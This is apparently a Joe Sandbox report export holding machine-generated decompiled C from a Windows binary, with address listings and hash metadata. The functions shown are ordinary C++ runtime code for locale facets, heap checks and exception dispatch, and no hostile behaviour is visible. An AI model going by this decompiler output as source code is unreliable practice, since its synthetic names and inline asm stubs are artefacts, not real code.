                                                																											return L001A9F7A(_v276);
                                                																										} else {
                                                																											_t373 =  *((intOrPtr*)(_t214 - 4));
                                                																											_t351 = _t351 + 0x23;
                                                																											__eflags = _t214 - _t373 + 0xfffffffc - 0x1f;
                                                																											if(_t214 - _t373 + 0xfffffffc > 0x1f) {
                                                																												_push(_t397);
                                                																												_t399 = _t397 ^ _t397;
                                                																												E001AFD8F(_t399, _t399, _t399, _t399, _t399);
                                                																												_push(_t399);
                                                																												_push(_t399);
                                                																												_push(_t399);
                                                																												_push(_t399);
                                                																												_push(_t399);
                                                																												L122();
                                                																												asm("int3");
                                                																												_t219 = IsProcessorFeaturePresent(0x17);
                                                																												__eflags = _t219;
                                                																												if(_t219 != 0) {
                                                																													_push(5);
                                                																													asm("int 0x29");
                                                																												}
                                                																												_push(_t399);
                                                																												E001AFC47(_t325, _t373, 0xc0000417, 2, 0xc0000417, 1);
                                                																												return TerminateProcess(GetCurrentProcess(), 0xc0000417);
                                                																											} else {
                                                																												_t214 = _t373;
                                                																												goto L118;
                                                																											}
                                                																										}
                                                																									} else {
                                                																										E001A657D( &_v264,  &_v264, _t383);
                                                																										 *(_t397 + 4) = 0;
                                                																										 *_t397 = 0x1c72dc;
                                                																										E001A8D38(_t383, _t397, __eflags, _t433 + 0x50);
                                                																										_t436 = _t433 + 0xc;
                                                																										asm("movups xmm0, [eax]");
                                                																										asm("movups [esi+0x8], xmm0");
                                                																										_t228 = E001A8EAF(_t436 + 0x58);
                                                																										asm("movups xmm0, [eax]");
                                                																										asm("movups [esi+0x18], xmm0");
                                                																										asm("movups xmm0, [eax+0x10]");
                                                																										asm("movups [esi+0x28], xmm0");
                                                																										asm("movq xmm0, [eax+0x20]");
                                                																										asm("movq [esi+0x38], xmm0");
                                                																										 *((intOrPtr*)(_t397 + 0x40)) =  *((intOrPtr*)(_t228 + 0x28));
                                                																										E001A65C8( &_v264,  &_v264);
                                                																										_t232 = _v220;
                                                																										_t438 = _t436 + 8;
                                                																										__eflags = _t232;
                                                																										if(_t232 != 0) {
                                                																											E001AFB09(_t232);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_t233 = _v228;
                                                																										_v220 = 0;
                                                																										__eflags = _t233;
                                                																										if(_t233 != 0) {
                                                																											E001AFB09(_t233);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_t234 = _v236;
                                                																										_v228 = 0;
                                                																										__eflags = _t234;
                                                																										if(_t234 != 0) {
                                                																											E001AFB09(_t234);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_t235 = _v244;
                                                																										_v236 = 0;
                                                																										__eflags = _t235;
                                                																										if(_t235 != 0) {
                                                																											E001AFB09(_t235);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_t236 = _v252;
                                                																										_v244 = 0;
                                                																										__eflags = _t236;
                                                																										if(_t236 != 0) {
                                                																											E001AFB09(_t236);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_t237 = _v260;
                                                																										_v252 = 0;
                                                																										__eflags = _t237;
                                                																										if(_t237 != 0) {
                                                																											E001AFB09(_t237);
                                                																											_t438 = _t438 + 4;
                                                																										}
                                                																										_v260 = 0;
                                                																										E001A6182( &_v264);
                                                																										E001A644B(__eflags, _t397);
                                                																										_t431 = _t438 + 4;
                                                																										 *((intOrPtr*)( *_t397 + 4))();
                                                																										 *0x203570 = _t397;
                                                																										goto L88;
                                                																									}
                                                																								} else {
                                                																									_t397 = _t415;
                                                																									goto L88;
                                                																								}
                                                																							} else {
                                                																								_t397 =  *(_t325 +  *((intOrPtr*)(_t248 + 8)));
                                                																								goto L93;
                                                																							}
                                                																						}
                                                																					} else {
                                                																						L88:
                                                																						E001A6182( &_v144);
                                                																						_pop(_t382);
                                                																						_pop(_t398);
                                                																						_pop(_t326);
                                                																						__eflags = _v136 ^ _t431;
                                                																						return E001A9545(_t397, _t326, _v136 ^ _t431, _t372, _t382, _t398);
                                                																					}
                                                																				}
                                                																			} else {
                                                																				_t92 = _t274 + 0x23; // 0x23
                                                																				_t395 = _t92 & 0xffffffe0;
                                                																				 *(_t395 - 4) = _t274;
                                                																				L73:
                                                																				_t323[4] = _v132;
                                                																				_t323[5] = _t379;
                                                																				_t386 = _t395 + _t414;
                                                																				__eflags = _v128 - 0x10;
                                                																				_v132 = _v104 + _t395 + _t414;
                                                																				_push(_t414);
                                                																				if(_v128 < 0x10) {
                                                																					_push(_t323);
                                                																					_push(_t395);
                                                																					E001AA810();
                                                																					E001AA810(_t386,  *((intOrPtr*)(_t430 + 0x28)), _v104);
                                                																					 *_v132 = 0;
                                                																					 *_t323 = _t395;
                                                																					return _t323;
                                                																				} else {
                                                																					_t388 =  *_t323;
                                                																					_push(_t388);
                                                																					_push(_t395);
                                                																					E001AA810();
                                                																					E001AA810(_t395 + _t414,  *((intOrPtr*)(_t430 + 0x28)), _v104);
                                                																					_t430 = _t430 + 0x18;
                                                																					_t361 = _v128 + 1;
                                                																					 *_v132 = 0;
                                                																					__eflags = _t361 - 0x1000;
                                                																					if(_t361 < 0x1000) {
                                                																						L77:
                                                																						_push(_t361);
                                                																						_push(_t388);
                                                																						L120();
                                                																						 *_t323 = _t395;
                                                																						return _t323;
                                                																					} else {
                                                																						_t372 =  *(_t388 - 4);
                                                																						_t361 = _t361 + 0x23;
                                                																						_t379 = _t388 - _t372;
                                                																						_t109 = _t379 - 4; // 0x7ffffffb
                                                																						__eflags = _t109 - 0x1f;
                                                																						if(_t109 > 0x1f) {
                                                																							goto L81;
                                                																						} else {
                                                																							_t388 = _t372;
                                                																							goto L77;
                                                																						}
                                                																					}
                                                																				}
                                                																			}
                                                																		}
                                                																	}
                                                																} else {
                                                																	_t395 = _v104;
                                                																	E001A644B(__eflags, _t395);
                                                																	_t371 =  *_t395;
                                                																	_t427 = _t429 + 4;
                                                																	 *((intOrPtr*)( *_t395 + 4))();
                                                																	 *0x20356c = _t395;
                                                																	goto L57;
                                                																}
                                                															} else {
                                                																_t395 = _t321;
                                                																goto L57;
                                                															}
                                                														} else {
                                                															_t395 =  *( *((intOrPtr*)(_t278 + 8)) + _t412);
                                                															goto L52;
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_a20 = 0xf;
                                                											__eflags = _t378 - 0x10;
                                                											if(_t378 >= 0x10) {
                                                												_push(_t319);
                                                												_t330 = _t378 | 0x0000000f;
                                                												_push(_t393);
                                                												__eflags = _t330 - 0x7fffffff;
                                                												if(_t330 <= 0x7fffffff) {
                                                													__eflags = _t330 - 0x16;
                                                													_t331 =  <  ? 0x16 : _t330;
                                                												} else {
                                                													_t331 = 0x7fffffff;
                                                												}
                                                												_t57 = _t331 + 1; // 0x80000000
                                                												_t405 = E001A5E90();
                                                												_a16 = _t378;
                                                												 *_t410 = _t405;
                                                												_a20 = _t331;
                                                												_t288 = E001AA810(_t405, _v88, _t378);
                                                												 *((char*)(_t378 + _t405)) = 0;
                                                												return _t288;
                                                											} else {
                                                												_a16 = _t378;
                                                												return E001AA810(_t410, _t186, _t378);
                                                											}
                                                										}
                                                									} else {
                                                										E001A657D(_t338,  &_v64, _t377);
                                                										 *(_t393 + 4) = 0;
                                                										 *_t393 = 0x1c811c;
                                                										E001A65C8(_t338,  &_v64);
                                                										_t294 = _v20;
                                                										_t445 = _t426 + 0xc;
                                                										__eflags = _t294;
                                                										if(_t294 != 0) {
                                                											E001AFB09(_t294);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_t295 = _v28;
                                                										_v20 = 0;
                                                										__eflags = _t295;
                                                										if(_t295 != 0) {
                                                											E001AFB09(_t295);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_t296 = _v36;
                                                										_v28 = 0;
                                                										__eflags = _t296;
                                                										if(_t296 != 0) {
                                                											E001AFB09(_t296);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_t297 = _v44;
                                                										_v36 = 0;
                                                										__eflags = _t297;
                                                										if(_t297 != 0) {
                                                											E001AFB09(_t297);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_t298 = _v52;
                                                										_v44 = 0;
                                                										__eflags = _t298;
                                                										if(_t298 != 0) {
                                                											E001AFB09(_t298);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_t299 = _v60;
                                                										_v52 = 0;
                                                										__eflags = _t299;
                                                										if(_t299 != 0) {
                                                											E001AFB09(_t299);
                                                											_t445 = _t445 + 4;
                                                										}
                                                										_v60 = 0;
                                                										E001A6182( &_v64);
                                                										E001A644B(__eflags, _t393);
                                                										_t424 = _t445 + 4;
                                                										 *((intOrPtr*)( *_t393 + 4))();
                                                										 *0x203574 = _t393;
                                                										goto L6;
                                                									}
                                                								} else {
                                                									_t393 = _t408;
                                                									goto L6;
                                                								}
                                                							} else {
                                                								_t393 =  *(_t319 +  *((intOrPtr*)(_t310 + 8)));
                                                								goto L11;
                                                							}
                                                						}
                                                					} else {
                                                						L6:
                                                						E001A6182( &_v12);
                                                						_pop(_t376);
                                                						_pop(_t394);
                                                						_pop(_t320);
                                                						return E001A9545(_t393, _t320, _v4 ^ _t424, _t371, _t376, _t394);
                                                					}
                                                				}
                                                			}


















































































































































                                                0x001a4eb0
                                                0x001a4eb0
                                                0x001a4eb3
                                                0x001a4eba
                                                0x001a4ebe
                                                0x001a4ebf
                                                0x001a4ec9
                                                0x001a4ecc
                                                0x001a4ed0
                                                0x001a4ed5
                                                0x001a4edb
                                                0x001a4ee3
                                                0x001a4eea
                                                0x001a4eef
                                                0x001a4ef5
                                                0x001a4ef7
                                                0x001a4efc
                                                0x001a4efd
                                                0x001a4f02
                                                0x001a4f02
                                                0x001a4f0b
                                                0x001a4f10
                                                0x001a4f10
                                                0x001a4f16
                                                0x001a4f19
                                                0x001a4f23
                                                0x001a4f4d
                                                0x001a4f4d
                                                0x00000000
                                                0x001a4f25
                                                0x001a4f28
                                                0x001a4f2d
                                                0x001a4f4f
                                                0x001a4f4f
                                                0x001a4f53
                                                0x001a4f65
                                                0x001a4f65
                                                0x001a4f67
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a4f55
                                                0x001a4f55
                                                0x001a4f5a
                                                0x001a4f5d
                                                0x001a4f69
                                                0x001a4f69
                                                0x001a4f6b
                                                0x001a4f78
                                                0x001a4f7a
                                                0x001a4f81
                                                0x001a4f84
                                                0x001a4f86
                                                0x001a4f94
                                                0x001a4f88
                                                0x001a4f88
                                                0x001a4f8b
                                                0x001a4f8d
                                                0x001a4f8f
                                                0x001a4f8f
                                                0x001a4f8d
                                                0x001a4f9b
                                                0x001a4f9f
                                                0x001a4fa6
                                                0x001a4fae
                                                0x001a4fb3
                                                0x001a4fbb
                                                0x001a4fc0
                                                0x001a4fc8
                                                0x001a4fcd
                                                0x001a4fd1
                                                0x001a4fd6
                                                0x001a4fda
                                                0x001a4fde
                                                0x001a4fe2
                                                0x001a4fe6
                                                0x001a4fe8
                                                0x001a50d2
                                                0x001a50d7
                                                0x001a50d8
                                                0x001a50d9
                                                0x001a50da
                                                0x001a50db
                                                0x001a50dc
                                                0x001a50dd
                                                0x001a50de
                                                0x001a50df
                                                0x001a50e0
                                                0x001a50e1
                                                0x001a50e5
                                                0x001a50e6
                                                0x001a50e7
                                                0x001a50eb
                                                0x001a50ed
                                                0x001a50f1
                                                0x001a50f7
                                                0x001a5167
                                                0x001a516c
                                                0x001a516d
                                                0x001a516e
                                                0x001a516f
                                                0x001a5170
                                                0x001a5173
                                                0x001a517a
                                                0x001a517e
                                                0x001a517f
                                                0x001a5188
                                                0x001a5189
                                                0x001a518c
                                                0x001a5190
                                                0x001a5195
                                                0x001a519b
                                                0x001a51a1
                                                0x001a51a5
                                                0x001a51a7
                                                0x001a51ae
                                                0x001a51b3
                                                0x001a51b9
                                                0x001a51bb
                                                0x001a51c0
                                                0x001a51c0
                                                0x001a51c1
                                                0x001a51c6
                                                0x001a51c6
                                                0x001a51cf
                                                0x001a51d4
                                                0x001a51d4
                                                0x001a51da
                                                0x001a51dd
                                                0x001a51e4
                                                0x001a51e7
                                                0x001a51f5
                                                0x001a51f5
                                                0x00000000
                                                0x001a51e9
                                                0x001a51ec
                                                0x001a51ef
                                                0x001a51f1
                                                0x001a5249
                                                0x001a524d
                                                0x001a5258
                                                0x001a5259
                                                0x001a525b
                                                0x001a525c
                                                0x001a5266
                                                0x001a51f3
                                                0x001a51f7
                                                0x001a51f7
                                                0x001a51fb
                                                0x001a520d
                                                0x001a520d
                                                0x001a520f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a51fd
                                                0x001a51fd
                                                0x001a5202
                                                0x001a5205
                                                0x001a5211
                                                0x001a5211
                                                0x001a5213
                                                0x001a5219
                                                0x001a5222
                                                0x001a5227
                                                0x001a522a
                                                0x001a522d
                                                0x001a5267
                                                0x001a526c
                                                0x001a526d
                                                0x001a526e
                                                0x001a526f
                                                0x001a5270
                                                0x001a5277
                                                0x001a527b
                                                0x001a527c
                                                0x001a527e
                                                0x001a5287
                                                0x001a528a
                                                0x001a528f
                                                0x001a5291
                                                0x001a53c0
                                                0x00000000
                                                0x001a5297
                                                0x001a5297
                                                0x001a5298
                                                0x001a529b
                                                0x001a529e
                                                0x001a52a1
                                                0x001a52a5
                                                0x001a52a8
                                                0x001a52ac
                                                0x001a52ae
                                                0x001a52d8
                                                0x001a52dc
                                                0x001a52de
                                                0x001a52e7
                                                0x001a52e9
                                                0x001a52eb
                                                0x001a52ee
                                                0x001a52ee
                                                0x001a52f1
                                                0x001a52f7
                                                0x001a5306
                                                0x001a5308
                                                0x001a5317
                                                0x001a5317
                                                0x001a530a
                                                0x001a530b
                                                0x001a5310
                                                0x001a5313
                                                0x001a5313
                                                0x00000000
                                                0x001a52f9
                                                0x001a52f9
                                                0x001a52f9
                                                0x001a52fc
                                                0x001a52fe
                                                0x001a53c5
                                                0x001a53c5
                                                0x00000000
                                                0x001a5304
                                                0x00000000
                                                0x001a5304
                                                0x001a52fe
                                                0x001a52e0
                                                0x001a52e0
                                                0x00000000
                                                0x001a52e0
                                                0x001a52b0
                                                0x001a52b0
                                                0x001a52b2
                                                0x001a52b7
                                                0x001a52b7
                                                0x001a52ba
                                                0x001a52bb
                                                0x001a52c0
                                                0x001a52c3
                                                0x001a52c5
                                                0x001a53ca
                                                0x001a53ca
                                                0x001a53cf
                                                0x001a53d0
                                                0x001a53d6
                                                0x001a53dd
                                                0x001a53e4
                                                0x001a53e5
                                                0x001a53f3
                                                0x001a53f4
                                                0x001a53f5
                                                0x001a53f8
                                                0x001a53fc
                                                0x001a5401
                                                0x001a5407
                                                0x001a540d
                                                0x001a540f
                                                0x001a5419
                                                0x001a541e
                                                0x001a5424
                                                0x001a5426
                                                0x001a542b
                                                0x001a542b
                                                0x001a542c
                                                0x001a5431
                                                0x001a5431
                                                0x001a543d
                                                0x001a5442
                                                0x001a5442
                                                0x001a5448
                                                0x001a544b
                                                0x001a5452
                                                0x001a5455
                                                0x001a5488
                                                0x001a5488
                                                0x00000000
                                                0x001a5457
                                                0x001a545a
                                                0x001a545d
                                                0x001a545f
                                                0x001a548a
                                                0x001a548a
                                                0x001a548e
                                                0x001a54a0
                                                0x001a54a0
                                                0x001a54a2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x001a5490
                                                0x001a5490
                                                0x001a5495
                                                0x001a5498
                                                0x001a54a4
                                                0x001a54a4
                                                0x001a54a6
                                                0x001a54b3
                                                0x001a54b5
                                                0x001a54bc
                                                0x001a54bf
                                                0x001a54c1
                                                0x001a54cf
                                                0x001a54c3
                                                0x001a54c3
                                                0x001a54c6
                                                0x001a54c8
                                                0x001a54ca
                                                0x001a54ca
                                                0x001a54c8
                                                0x001a54da
                                                0x001a54e1
                                                0x001a54e9
                                                0x001a54ee
                                                0x001a54f6
                                                0x001a54fb
                                                0x001a5503
                                                0x001a5508
                                                0x001a550c
                                                0x001a5511
                                                0x001a5515
                                                0x001a5519
                                                0x001a551d
                                                0x001a5521
                                                0x001a5523
                                                0x001a564d
                                                0x001a5652
                                                0x001a5653
                                                0x001a5654
                                                0x001a5655
                                                0x001a5656
                                                0x001a5657
                                                0x001a5658
                                                0x001a5659
                                                0x001a565a
                                                0x001a565b
                                                0x001a565c
                                                0x001a565d
                                                0x001a565e
                                                0x001a565f
                                                0x001a5660
                                                0x001a5664
                                                0x001a5668
                                                0x001a566e
                                                0x001a5682
                                                0x001a5682
                                                0x001a5686
                                                0x001a9583
                                                0x001a9590
                                                0x001a5670
                                                0x001a5670
                                                0x001a5673
                                                0x001a567b
                                                0x001a567e
                                                0x001afe55
                                                0x001afe56
                                                0x001afe5d
                                                0x001afe65
                                                0x001afe66
                                                0x001afe67
                                                0x001afe68
                                                0x001afe69
                                                0x001afe6a
                                                0x001afe6f
                                                0x001afe72
                                                0x001afe78
                                                0x001afe7a
                                                0x001afe7c
                                                0x001afe7f
                                                0x001afe7f
                                                0x001afe81
                                                0x001afe8c
                                                0x001afea3
                                                0x001a5680
                                                0x001a5680
                                                0x00000000
                                                0x001a5680
                                                0x001a567e
                                                0x001a5529
                                                0x001a552f
                                                0x001a5538
                                                0x001a5540
                                                0x001a5546
                                                0x001a554b
                                                0x001a554e
                                                0x001a5556
                                                0x001a555a
                                                0x001a5562
                                                0x001a5565
                                                0x001a5569
                                                0x001a556d
                                                0x001a5571
                                                0x001a5576
                                                0x001a557e
                                                0x001a5586
                                                0x001a558b
                                                0x001a558f
                                                0x001a5592
                                                0x001a5594
                                                0x001a5597
                                                0x001a559c
                                                0x001a559c
                                                0x001a559f
                                                0x001a55a3
                                                0x001a55ab
                                                0x001a55ad
                                                0x001a55b0
                                                0x001a55b5
                                                0x001a55b5
                                                0x001a55b8
                                                0x001a55bc
                                                0x001a55c4
                                                0x001a55c6
                                                0x001a55c9
                                                0x001a55ce
                                                0x001a55ce
                                                0x001a55d1
                                                0x001a55d5
                                                0x001a55dd
                                                0x001a55df
                                                0x001a55e2
                                                0x001a55e7
                                                0x001a55e7
                                                0x001a55ea
                                                0x001a55ee
                                                0x001a55f6
                                                0x001a55f8
                                                0x001a55fb
                                                0x001a5600
                                                0x001a5600
                                                0x001a5603
                                                0x001a5607
                                                0x001a560f
                                                0x001a5611
                                                0x001a5614
                                                0x001a5619
                                                0x001a5619
                                                0x001a5620
                                                0x001a5628
                                                0x001a562e
                                                0x001a5635
                                                0x001a563a
                                                0x001a563d
                                                0x00000000
                                                0x001a563d
                                                0x001a54a8
                                                0x001a54a8
                                                0x00000000
                                                0x001a54a8
                                                0x001a549a
                                                0x001a549d
                                                0x00000000
                                                0x001a549d
                                                0x001a5498
                                                0x001a5461
                                                0x001a5461
                                                0x001a5468
                                                0x001a5476
                                                0x001a5477
                                                0x001a5479
                                                0x001a547a
                                                0x001a5487
                                                0x001a5487
                                                0x001a545f
                                                0x001a52cb
                                                0x001a52cb
                                                0x001a52ce
                                                0x001a52d1
                                                0x001a5319
                                                0x001a531d
                                                0x001a5324
                                                0x001a5327
                                                0x001a532c
                                                0x001a5331
                                                0x001a5335
                                                0x001a5336
                                                0x001a5393
                                                0x001a5394
                                                0x001a5395
                                                0x001a53a3
                                                0x001a53b0
                                                0x001a53b5
                                                0x001a53bd
                                                0x001a5338
                                                0x001a5338
                                                0x001a533a
                                                0x001a533b
                                                0x001a533c
                                                0x001a534d
                                                0x001a5356
                                                0x001a535d
                                                0x001a535e
                                                0x001a5361
                                                0x001a5367
                                                0x001a537b
                                                0x001a537b
                                                0x001a537c
                                                0x001a537d
                                                0x001a5385
                                                0x001a5390
                                                0x001a5369
                                                0x001a5369
                                                0x001a536c
                                                0x001a536f
                                                0x001a5371
                                                0x001a5374
                                                0x001a5377
                                                0x00000000
                                                0x001a5379
                                                0x001a5379
                                                0x00000000
                                                0x001a5379
                                                0x001a5377
                                                0x001a5367
                                                0x001a5336
                                                0x001a52c5
                                                0x001a52ae
                                                0x001a522f
                                                0x001a522f
                                                0x001a5234
                                                0x001a5239
                                                0x001a523b
                                                0x001a5240
                                                0x001a5243
                                                0x00000000
                                                0x001a5243
                                                0x001a5215
                                                0x001a5215
                                                0x00000000
                                                0x001a5215
                                                0x001a5207
                                                0x001a520a
                                                0x00000000
                                                0x001a520a
                                                0x001a5205
                                                0x001a51fb
                                                0x001a51f1
                                                0x001a50f9
                                                0x001a50f9
                                                0x001a5100
                                                0x001a5103
                                                0x001a5119
                                                0x001a511c
                                                0x001a511f
                                                0x001a5120
                                                0x001a5126
                                                0x001a5134
                                                0x001a5136
                                                0x001a5128
                                                0x001a5128
                                                0x001a5128
                                                0x001a5139
                                                0x001a5147
                                                0x001a5149
                                                0x001a514d
                                                0x001a5150
                                                0x001a5153
                                                0x001a515b
                                                0x001a5164
                                                0x001a5105
                                                0x001a5108
                                                0x001a5116
                                                0x001a5116
                                                0x001a5103
                                                0x001a4fee
                                                0x001a4ff4
                                                0x001a4ffd
                                                0x001a5005
                                                0x001a500b
                                                0x001a5010
                                                0x001a5014
                                                0x001a5017
                                                0x001a5019
                                                0x001a501c
                                                0x001a5021
                                                0x001a5021
                                                0x001a5024
                                                0x001a5028
                                                0x001a5030
                                                0x001a5032
                                                0x001a5035
                                                0x001a503a
                                                0x001a503a
                                                0x001a503d
                                                0x001a5041
                                                0x001a5049
                                                0x001a504b
                                                0x001a504e
                                                0x001a5053
                                                0x001a5053
                                                0x001a5056
                                                0x001a505a
                                                0x001a5062
                                                0x001a5064
                                                0x001a5067
                                                0x001a506c
                                                0x001a506c
                                                0x001a506f
                                                0x001a5073
                                                0x001a507b
                                                0x001a507d
                                                0x001a5080
                                                0x001a5085
                                                0x001a5085
                                                0x001a5088
                                                0x001a508c
                                                0x001a5094
                                                0x001a5096
                                                0x001a5099
                                                0x001a509e
                                                0x001a509e
                                                0x001a50a5
                                                0x001a50ad
                                                0x001a50b3
                                                0x001a50ba
                                                0x001a50bf
                                                0x001a50c2
                                                0x00000000
                                                0x001a50c2
                                                0x001a4f6d
                                                0x001a4f6d
                                                0x00000000
                                                0x001a4f6d
                                                0x001a4f5f
                                                0x001a4f62
                                                0x00000000
                                                0x001a4f62
                                                0x001a4f5d
                                                0x001a4f2f
                                                0x001a4f2f
                                                0x001a4f33
                                                0x001a4f3e
                                                0x001a4f3f
                                                0x001a4f41
                                                0x001a4f4c
                                                0x001a4f4c
                                                0x001a4f2d

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A4ED0
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A4EEA
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A4F0B
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A4F33
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A4F9F
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A4FF4
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001A500B
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A50AD
                                                • std::_Facet_Register.LIBCPMT ref: 001A50B3
                                                  • Part of subcall function 001A62F1: std::invalid_argument::invalid_argument.LIBCONCRT ref: 001A62FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_Locinfo_ctorLocinfo_dtorRegisterstd::invalid_argument::invalid_argument
                                                • String ID: bad locale name
                                                • API String ID: 1592514138-1405518554
                                                • Opcode ID: e83ff343aa5028aa9c88429b06c7bf1f1feaa3ecffdbbbbf2fc38085d420d547
                                                • Instruction ID: 36145e512a6d872656406b47233744deb6ba1623c7d7629a066fe189a5bb8bc7
                                                • Opcode Fuzzy Hash: e83ff343aa5028aa9c88429b06c7bf1f1feaa3ecffdbbbbf2fc38085d420d547
                                                • Instruction Fuzzy Hash: 0D51A0B89083409FD710DF68D845B1BBBE4AFE6354F09082CF88497352E770E909CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 63%
                                                			E001ACCE8(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
                                                				signed char* _v0;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				char _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				intOrPtr _v48;
                                                				signed int _v52;
                                                				intOrPtr _v56;
                                                				intOrPtr _v60;
                                                				void _v64;
                                                				signed int _v68;
                                                				char _v84;
                                                				intOrPtr _v88;
                                                				signed int _v92;
                                                				intOrPtr _v100;
                                                				void _v104;
                                                				intOrPtr* _v112;
                                                				signed char* _v184;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				void* _t201;
                                                				signed int _t202;
                                                				char _t203;
                                                				signed int _t205;
                                                				signed int _t207;
                                                				signed char* _t208;
                                                				signed int _t209;
                                                				signed int _t210;
                                                				signed int _t214;
                                                				void* _t217;
                                                				signed char* _t220;
                                                				void* _t222;
                                                				void* _t224;
                                                				signed char _t228;
                                                				signed int _t229;
                                                				void* _t231;
                                                				void* _t234;
                                                				void* _t237;
                                                				signed int _t247;
                                                				void* _t250;
                                                				intOrPtr* _t251;
                                                				signed int _t252;
                                                				intOrPtr _t253;
                                                				signed int _t254;
                                                				void* _t259;
                                                				void* _t264;
                                                				void* _t265;
                                                				signed int _t269;
                                                				signed char* _t270;
                                                				intOrPtr* _t271;
                                                				signed char _t272;
                                                				signed int _t273;
                                                				signed int _t274;
                                                				intOrPtr* _t276;
                                                				signed int _t277;
                                                				signed int _t278;
                                                				signed int _t283;
                                                				signed int _t290;
                                                				signed int _t291;
                                                				signed int _t294;
                                                				signed int _t296;
                                                				signed char* _t297;
                                                				signed int _t298;
                                                				signed char _t299;
                                                				signed int* _t301;
                                                				signed char* _t304;
                                                				signed int _t314;
                                                				signed int _t315;
                                                				signed int _t317;
                                                				signed int _t327;
                                                				void* _t329;
                                                				void* _t331;
                                                				void* _t332;
                                                				void* _t333;
                                                				void* _t334;
                                                
                                                				_t296 = __edx;
                                                				_push(_t315);
                                                				_t301 = _a20;
                                                				_v20 = 0;
                                                				_v28 = 0;
                                                				_t275 = E001ADC60(_a8, _a16, _t301);
                                                				_t332 = _t331 + 0xc;
                                                				_v12 = _t275;
                                                				if(_t275 < 0xffffffff || _t275 >= _t301[1]) {
                                                					L67:
                                                					_t201 = E001B2DB9(_t270, _t275, _t296, _t315);
                                                					asm("int3");
                                                					_t329 = _t332;
                                                					_t333 = _t332 - 0x38;
                                                					_push(_t270);
                                                					_t271 = _v112;
                                                					__eflags =  *_t271 - 0x80000003;
                                                					if( *_t271 == 0x80000003) {
                                                						return _t201;
                                                					} else {
                                                						_t202 = E001AC96C(_t271, _t275, _t296, _t315, _t301, _t315);
                                                						__eflags =  *(_t202 + 8);
                                                						if( *(_t202 + 8) != 0) {
                                                							__imp__EncodePointer(0);
                                                							_t315 = _t202;
                                                							_t222 = E001AC96C(_t271, _t275, _t296, _t315);
                                                							__eflags =  *((intOrPtr*)(_t222 + 8)) - _t315;
                                                							if( *((intOrPtr*)(_t222 + 8)) != _t315) {
                                                								__eflags =  *_t271 - 0xe0434f4d;
                                                								if( *_t271 != 0xe0434f4d) {
                                                									__eflags =  *_t271 - 0xe0434352;
                                                									if( *_t271 != 0xe0434352) {
                                                										_t214 = E001AA519(_t296, _t315, _t271, _a4, _a8, _a12, _a16, _a24, _a28);
                                                										_t333 = _t333 + 0x1c;
                                                										__eflags = _t214;
                                                										if(_t214 != 0) {
                                                											L84:
                                                											return _t214;
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                						_t203 = _a16;
                                                						_v28 = _t203;
                                                						_v24 = 0;
                                                						__eflags =  *(_t203 + 0xc);
                                                						if( *(_t203 + 0xc) > 0) {
                                                							_push(_a24);
                                                							E001AA44C(_t271, _t275, 0, _t315,  &_v44,  &_v28, _a20, _a12, _t203);
                                                							_t298 = _v40;
                                                							_t334 = _t333 + 0x18;
                                                							_t214 = _v44;
                                                							_v20 = _t214;
                                                							_v12 = _t298;
                                                							__eflags = _t298 - _v32;
                                                							if(_t298 >= _v32) {
                                                								goto L84;
                                                							}
                                                							_t277 = _t298 * 0x14;
                                                							__eflags = _t277;
                                                							_v16 = _t277;
                                                							do {
                                                								_t278 = 5;
                                                								_t217 = memcpy( &_v64,  *((intOrPtr*)( *_t214 + 0x10)) + _t277, _t278 << 2);
                                                								_t334 = _t334 + 0xc;
                                                								__eflags = _v64 - _t217;
                                                								if(_v64 > _t217) {
                                                									goto L83;
                                                								}
                                                								__eflags = _t217 - _v60;
                                                								if(_t217 > _v60) {
                                                									goto L83;
                                                								}
                                                								_t220 = _v48 + 0xfffffff0 + (_v52 << 4);
                                                								_t283 = _t220[4];
                                                								__eflags = _t283;
                                                								if(_t283 == 0) {
                                                									L81:
                                                									__eflags =  *_t220 & 0x00000040;
